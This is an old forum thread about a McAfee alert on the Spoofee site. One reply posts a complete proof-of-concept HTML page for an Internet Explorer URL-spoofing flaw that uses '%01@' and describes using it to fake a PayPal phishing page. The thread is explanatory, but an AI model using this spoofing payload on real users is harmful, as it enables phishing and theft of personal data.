Virus Alert when accessing Spoofee

[osprey4]

I'm getting the following virus alert when accessing Spoofee. Has anyone ever seen this? This is on my work PC, we use McAfee.

[Steve R Jones]

Looks like it's a temp file. Might try deleting them.

[osprey4]

Yes, I went through and completely cleaned out my temp internet files, then went back to the site and got that message again.

Maybe I'll just stay away from Spoofee.

[rastorize]

Yes - seen that before. McAfee is telling you that the webpage is using HTML code and an IE-eploit to spoof an IP address...there is an exploit in IE that can allow someone to ‘fake’ a website url in order to trick you into thinking you are on a legitimate site...but in reality you are on a 'spoofed' site.

To see how it works, take the code below, and put it into Notepad and save as an HTML page: Test the page in a browser...it'll give you a better description of the exploit...when you open the page in IE, you'll see that in the Address space the URL SAYS microsoft.com...but you are looking at the real intel.com...

Quote:

<HTML>
<Head>
<Title>Internet Explorer Vulnerability</Title>
<META NAME="KEYWORDS" CONTENT="zapthedingbat; window; location; link; href; url; vulnerability; exploit; proof of consept; bug; news; security;" />
<META NAME="DESCRIPTION" CONTENT="Flaw in the way that Internet Explorer displays URLs in the address bar. Example" />
</Head>
<Body style="font: 8pt verdana, sans-serif;color:#444;">

<p>
<b>Vulnerability</b><br/>
There is a flaw in the way that Internet Explorer displays URLs in the address bar.<br/>
By opening a specially crafted URL an attacker can open a page that appears to be from a different domain from the current location.
</p>

<p>
<b>Exploit</b><br/>
By opening a window using the http://user@domain nomenclature an attacker can hide the real location of the page by including a non printing character (%01) before the "@".<br/>
Internet Explorer doesn't display the rest of the URL making the page appear to be at a different domain.
</p>
<br/>
<button onclick="location.href=unescape('http://www.microsoft.com%01@intel.com');" style="font: 8pt verdana, sans-serif;">
Test Exploit
</button>
</Body>
</HTML>

For example, a person may fake a Paypal site that asks for your credit card info. So they’ll create their own Paypal site…and to make it seem authentic, include this exploit so that in the address bar it even says paypal.com. In reality, it is a site designed to steal your personal information.

[DVNT1]

a little more about that problem was posted here... http://www.techimo.com/forum/showthr...threadid=92100